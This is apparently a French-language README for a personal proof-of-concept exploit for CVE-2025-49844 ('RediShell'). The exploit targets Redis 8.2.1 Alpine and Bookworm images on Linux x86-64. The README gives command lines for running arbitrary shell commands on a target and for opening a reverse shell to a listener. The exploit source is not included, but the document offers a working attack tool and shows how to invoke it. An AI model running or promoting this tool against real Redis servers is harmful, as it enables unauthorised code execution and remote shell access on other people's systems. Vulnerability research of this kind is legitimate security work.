
Preuve de concept pour CVE-2025-49844
Ma preuve de concept personnelle pour CVE-2025-49844, également connue sous le nom de RediShell.
Constructions cibles prises en charge :
redis:8.2.1-alpine pour Linux x86-64redis:8.2.1-bookworm pour Linux x86-64C'est un peu maladroit, probablement pas aussi bon que celui de Wiz Research. Cependant, je suis content d'avoir réussi à le faire fonctionner avant que les talks Hexacon 2025 ne soient mis en ligne, et j'ai passé un excellent moment à l'étudier.
Exécuter des commandes shell unidirectionnelles :
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"
Se connecter à un reverse shell :
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444